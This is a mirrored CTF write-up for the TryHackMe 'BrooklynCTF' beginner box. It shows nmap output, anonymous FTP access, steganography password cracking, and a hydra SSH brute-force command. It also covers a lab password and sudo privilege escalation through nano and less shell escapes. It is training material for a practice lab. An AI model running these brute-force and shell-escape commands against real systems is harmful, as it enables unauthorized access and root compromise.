Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-10 06:34:17 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/TryHackMe/BrooklynCTF.md
AbdullahRizwan101 9175a2acea
Add files via upload
2020-08-28 18:44:42 +05:00

5.4 KiB
Raw Blame History

TryHackMe-BrooklynCTF

Abdullah Rizwan, 25 August , 09:15 PM

BrooklynCTF is a beginner level anyone can try to hack this box. There are two main intended ways to root the box.

NMAP

nmap -sC -sV 10.10.182.198

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-25 21:16 EDT
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 21:16 (0:00:00 remaining)
Nmap scan report for 10.10.182.198
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17 23:17 note_to_jake.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.8.94.60
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.96 seconds

There are 3 ports open on this box.Lets first visit the webpage.

PORT 80

When we look at the source of this page it says something about steganography so that image has something hidden with it.

PORT 21

Since ftp is open we can connect to using the username "anonymous" with no password to be provided and we can download a file named "note_to_jake".

So we know that there is a user named "jake".

Steganography

We saw a hidden message towards steganography so now lets try to extract data from image.

If we try to extract data from image it's going to ask for a password so we have to crack it using "stegcracker" which can be installed from here https://github.com/Paradoxis/StegCracker.

PORT 22

As we have found that there are two users "jake" and "holt" in order to find out jake's password we can bruteforce ssh using hydra

hydra -l jake -P /usr/share/wordlists/rockyou.txt -t 16 10.10.182.198 ssh

For simplicity lets make a variable for the box's IP

export IP=10.10.182.198

We can now use "less" command in order to view files.

Privilege Escalation (Holt)

In order to completely own the box through Holt we have sudo rights for "nano".

The password that we got from extracting information from the image can be utilized here

Login as "holt" from ssh using password "fluffydog12@ninenine".

holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User holt may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano
holt@brookly_nine_nine:~$

Visit GTFOBIN for escalating privileges

sudo nano

^R^X

reset; sh 1>&0 2>&0

As soon as you'll hit enter you will be "root".

Privilege Escalation (Jake)

Login as jake through ssh after you got his credentials through bruteforce or you can switch between usesr.

su - jake
password:


sudo less /etc/profile

!/bin/sh